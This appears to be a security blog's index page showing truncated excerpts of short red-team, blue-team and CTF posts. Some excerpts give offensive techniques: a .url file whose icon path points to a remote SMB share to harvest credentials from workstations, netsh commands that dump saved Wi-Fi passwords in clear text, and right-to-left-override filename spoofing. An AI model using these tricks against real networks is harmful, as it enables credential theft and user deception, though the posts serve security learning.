by frank | Jun 28, 2019 | CTF, Security
Reading Time: < 1 minuteif == strcomp then replace with array=[]if String, replace with true All == should be replace with === to be sure to keep the type of...
by frank | Jun 28, 2019 | Red team, Security, Windows
Reading Time: < 1 minutegenerate a file toto.url with the following content [InternetShortcut] URL=https://www.google.com/ IconIndex=0 IconFile=\\1.2.3.4\leak\leak.ico Place the toto.url file on a sharedrive. Many workstations will try to get the ico...
by frank | Jun 28, 2019 | Blue Team, Security, Windows
Reading Time: < 1 minuteLLMLR : Disable WPAD can be changed in Group Policy via the Services setting under ComputerConfiguration > Policies > Windows Settings > Security Settings > System Services and by disabling the WinHTTP WebProxy Auto-Discover...
by frank | Jun 25, 2019 | Linux, Security
On Linux, the issue is that if you want a process to listen to a lower port (<1024), then it needs to be run as root. You can circumvent this by running on http as a high port and redirect this high port to port 80. Example in config file : Listen 8080And...
by frank | May 16, 2019 | Red team, Security, Windows
Reading Time: < 1 minutenetsh wlan show profilenetsh wlan show profile name=”mywifi” key=clearor to get the whole list exported to a file powershell.exe netsh wlan show profiles|Select-String -Pattern ” User Profile”|ForEach-Object{echo...
by frank | Oct 28, 2018 | Red team, Security, Windows
Reading Time: 2 minutesRight-To-Left-Override is a way to trick Windows users into thinking that the file they are looking at has another extension. Many extensions are more dangerous than other. To name a few ones like : .exe .bat.cmd.com.lnk.pif.scr.vb.vbe.vbs.wsh...
Recent Comments